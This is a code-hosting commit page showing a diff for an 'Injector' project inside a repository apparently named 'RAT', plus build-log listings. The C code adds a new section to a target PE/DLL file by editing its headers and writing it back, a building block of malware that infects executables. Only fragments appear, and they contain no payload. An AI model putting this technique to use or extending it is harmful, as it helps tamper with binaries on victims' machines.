Switched to release and renamed some stuff
This commit is contained in:
@@ -1,4 +1,5 @@
|
||||
#include <Windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
DWORD AlignSectionHeader(DWORD section_size, DWORD alginment, DWORD address) {
|
||||
if (!(section_size % alginment))
|
||||
@@ -54,14 +55,25 @@ INT main(INT arg, PCHAR argv[]) {
|
||||
}
|
||||
|
||||
image_optional_header->SizeOfImage = image_section_header[PESections].VirtualAddress + image_section_header[PESections].Misc.VirtualSize;
|
||||
image_file_header->NumberOfSections += 1;
|
||||
|
||||
if (SetFilePointer(x_file, 0, NULL, FILE_BEGIN) != INVALID_SET_FILE_POINTER) {
|
||||
// add section
|
||||
WriteFile(x_file, file_buffer, file_size, &returned_bytes, NULL);
|
||||
}
|
||||
}
|
||||
}
|
||||
LocalFree(dll_buffer);
|
||||
}
|
||||
}
|
||||
}
|
||||
CloseHandle(code_file);
|
||||
}
|
||||
}
|
||||
LocalFree(file_buffer);
|
||||
}
|
||||
CloseHandle(x_file);
|
||||
}
|
||||
else
|
||||
printf("\nUSE: %s section name target dll\n",argv[0]);
|
||||
}
|
||||
@@ -0,0 +1,12 @@
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.pdb
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\vc141.idb
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\source.obj
|
||||
c:\users\hellisabove\source\repos\rat\x64\debug\injector.ilk
|
||||
c:\users\hellisabove\source\repos\rat\x64\debug\injector.exe
|
||||
c:\users\hellisabove\source\repos\rat\x64\debug\injector.pdb
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\cl.write.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.command.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.read.1.tlog
|
||||
c:\users\hellisabove\source\repos\rat\injector\x64\debug\injector.tlog\link.write.1.tlog
|
||||
|
||||
@@ -1 +1,3 @@
|
||||
|
||||
Source.cpp
|
||||
c:\users\hellisabove\source\repos\rat\injector\source.cpp(26): warning C4312: 'type cast': conversion from 'BOOL' to 'PIMAGE_DOS_HEADER' of greater size
|
||||
Injector.vcxproj -> C:\Users\hellisabove\source\repos\RAT\x64\Debug\Injector.exe
|
||||
|
||||
Reference in New Issue
Block a user